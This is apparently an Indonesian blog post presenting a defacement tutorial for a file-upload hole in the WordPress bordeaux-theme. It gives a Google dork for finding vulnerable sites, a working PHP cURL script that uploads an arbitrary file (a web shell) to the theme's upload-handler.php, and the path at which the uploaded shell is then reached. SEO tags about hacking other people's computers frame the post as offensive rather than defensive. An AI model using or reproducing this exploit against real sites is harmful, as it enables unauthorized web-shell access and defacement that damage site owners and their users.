Deface Menggunakan WordPress bordeaux-theme Themes Remote File Upload Vulnerability

# Exploit Title: WordPress bordeaux-theme Themes Remote File Upload Vulnerability
# Author: iskorpitx
# Date: 12/11/2013
# Vendor Homepage: http://www.orange-themes.com/
# Themes Link: http://www.orange-themes.com/portfolio/bordeaux/
# Infected File: upload-handler.php
# Category: webapps
# Google dork: "/wp-content/themes/bordeaux-theme/"
# Tested on : Windows/Linux
###################################################################################################

# Exploit


<?php
$uploadfile="upload.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/bordeaux-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

http://127.0.0.1/wordpress/wp-content/uploads/2013/11/upload.php


_________________________________

Akses shell : /wp-content/uploads/[tahun]/[bulan]/shellmu.php


example : www.co.il/uploads/2016/09/jembut.php


Semoga bermanfaat

Tags : Cara untuk Meretas sebuah Komputer,trick Hack Komputer Super Jail,Cara Mematikan Komputer Orang Lain,Cara Mengendalikan Komputer Jarak Jauh,Cara Meretas Komputer Orang Lain,Cara Hack Komputer Orang Lain,Cara Meretas Komputer Orang dari Jarak Jauh,Cara memantau Komputer lain dengan Command Prompt,Cara hack komputer remote menggunakan IP,Trik Hack Komputer yang Sangat Berbahaya,Dasar-dasar Meretas,Dasar-dasar Hack,
Share this article please, on :
Share on fb Tweet Share on G+

0 Response to "Deface Menggunakan WordPress bordeaux-theme Themes Remote File Upload Vulnerability"

Post a Comment

Powered by Blogger.